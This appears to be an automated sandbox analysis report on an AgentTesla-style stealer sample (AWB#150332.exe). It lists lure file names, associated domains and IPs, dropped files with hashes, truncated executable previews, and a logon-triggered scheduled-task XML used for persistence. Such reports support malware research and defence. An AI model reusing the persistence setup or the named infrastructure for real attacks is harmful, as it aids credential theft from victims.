                                            PO202408030008.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              shipping documents.bat.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                mail.azmaplast.comshipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                Massive.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                M.BL CSLEBKK2311030B.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                DHL_CBJ520818836689.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                DHL- CBJ520818836689.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                DHL- CBJ520818836689.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                Bank Details.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 193.141.65.39
                                                invoice and packing list.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 193.141.65.39
                                                PO202408030008.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39
                                                shipping documents.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                • 193.141.65.39

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                KPNNLloligang.mips.elfGet hashmaliciousMiraiBrowse
                                                • 92.71.76.235
                                                loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 62.132.169.22
                                                nabspc.elfGet hashmaliciousUnknownBrowse
                                                • 145.8.16.90
                                                i686.elfGet hashmaliciousUnknownBrowse
                                                • 92.71.180.75
                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 62.132.184.115
                                                nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                • 62.132.108.59
                                                x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 212.189.120.82
                                                owari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 62.132.39.140
                                                meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                • 145.8.211.183
                                                sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 62.132.39.140

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSOA_9828392091.exeGet hashmaliciousAgentTeslaBrowse
                                                  ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    Pi648je050.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                        Termination_List_November_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          Payment_Advice_USD_48,054.40_.exeGet hashmaliciousAgentTeslaBrowse
                                                            M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                                                              mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                                                                1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                                                  copto de pago.exeGet hashmaliciousAgentTeslaBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AWB#150332.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):142
                                                                    Entropy (8bit):5.090621108356562
                                                                    Encrypted:false
                                                                    SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                    MD5:8C0458BB9EA02D50565175E38D577E35
                                                                    SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                    SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                    SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nYNBzxFhCu.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2232
                                                                    Entropy (8bit):5.3797706053345555
                                                                    Encrypted:false
                                                                    SSDEEP:48:fWSU4xympx4RfoUP7gZ9tK8NPZHUx7u1iMuge//Z9yus:fLHxv/IwLZ2KRH6OugQs
                                                                    MD5:622AC6AAA9ADE50BADA65159CB384E00
                                                                    SHA1:0D969C19FC47EC07BAFA2584887D5E1FE5D9A09D
                                                                    SHA-256:DB2F76B22A3E51E2326BA008A016A65FFFE3BA5E7A638B355E6AFE8089983186
                                                                    SHA-512:61519FFCD6984EBAED1A45D550449CCF3EE7DEE427AF77149FA3C355ECBF88ED660A83FFFF9C91371091578C6FDE35187149F4150A83B1DEA6153B2FF5BDDC5F
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0hlxtf1.4cp.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ey3chofq.ibf.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kieghvoz.ylk.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmqjqke4.sqf.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1qvogms.t4s.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3neqm4a.33u.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vebrxxk5.byz.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zafsw4ee.5rl.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1604
                                                                    Entropy (8bit):5.129841701305694
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6Vxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT6rv
                                                                    MD5:5D44DB3EA674A9900AD40FD31E5379A2
                                                                    SHA1:D287AE29F1853FC670DD5540DD4CB4C8B00BA555
                                                                    SHA-256:54C72FD81101EB71569F59BBEAB249E80A83734D4ECA34637483B5DBA72639C5
                                                                    SHA-512:10640D1FF277DC723595E0EE35A25CB4C9AB27BEC4E276C2A0BBE395E3E172CC1CFAF5A58B4C0FDEC7C7FE9837559D5047BF1E299CF8BA34C6174332275DCC08
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                                    C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1604
                                                                    Entropy (8bit):5.129841701305694
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6Vxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT6rv
                                                                    MD5:5D44DB3EA674A9900AD40FD31E5379A2
                                                                    SHA1:D287AE29F1853FC670DD5540DD4CB4C8B00BA555
                                                                    SHA-256:54C72FD81101EB71569F59BBEAB249E80A83734D4ECA34637483B5DBA72639C5
                                                                    SHA-512:10640D1FF277DC723595E0EE35A25CB4C9AB27BEC4E276C2A0BBE395E3E172CC1CFAF5A58B4C0FDEC7C7FE9837559D5047BF1E299CF8BA34C6174332275DCC08
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                                    C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):45984
                                                                    Entropy (8bit):6.16795797263964
                                                                    Encrypted:false
                                                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: SOA_9828392091.exe, Detection: malicious, Browse
                                                                    • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                                    • Filename: Pi648je050.exe, Detection: malicious, Browse
                                                                    • Filename: shipping documents.exe, Detection: malicious, Browse
                                                                    • Filename: Termination_List_November_2024_pdf.exe, Detection: malicious, Browse
                                                                    • Filename: Payment_Advice_USD_48,054.40_.exe, Detection: malicious, Browse
                                                                    • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                                    • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                                                    • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                                    • Filename: copto de pago.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                    C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1061896
                                                                    Entropy (8bit):7.1796313022888985
                                                                    Encrypted:false
                                                                    SSDEEP:12288:npZsS/+l1pZQw1IvCtrVakpFGojVg3bInwCSfJqni4XVXlfo6jPIl0OmiWjKy9Uj:nzsBpz1/tr91jnw7Yi4XRxPjPIKiWjM
                                                                    MD5:DEF8249DC6DF546F68CE491EE14282C9
                                                                    SHA1:FDAAF599B51A6D13DDA0BADA44108DCA334EDDDC
                                                                    SHA-256:63382A3CC1E90E7DFA54826A62BFB5DA86F4AD44A07CFFCA70FA3C509BBD5AD7
                                                                    SHA-512:C181330B79CCDDC07C425172D83A48B29546F7197FAB39A952C3DB2C0E7B702368B10184E4A35CF2777F996D76FB80324A8DEE70E6F641C085D7965AD9BB5E84
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 26%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9...............0.............j.... ... ....@.. .......................`............@.....................................O.... ...................6...@..........p............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................J.......H........x..........7...@~...|...........................................0.............o.....8.....o....t.......u.........,@..t......o....r...po....-..o....r...po....+......,....o.......+&.u...........,...t........o....(........o....:t......u........,...o......*...................0...........#........}.....#........}.....#........}.....#.....L.@}......}......}.....s....}.....s....}.....sG...}.....sM...}......}......}.....(.......(.......{....(.......{!...(.......{....(.......

                                                                    C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\AWB#150332.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    \Device\ConDrv

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1141
                                                                    Entropy (8bit):4.442398121585593
                                                                    Encrypted:false
                                                                    SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                    MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                    SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                    SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                    SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                    Malicious:false
                                                                    Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.1796313022888985
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:AWB#150332.exe
                                                                    File size:1'061'896 bytes
                                                                    MD5:def8249dc6df546f68ce491ee14282c9
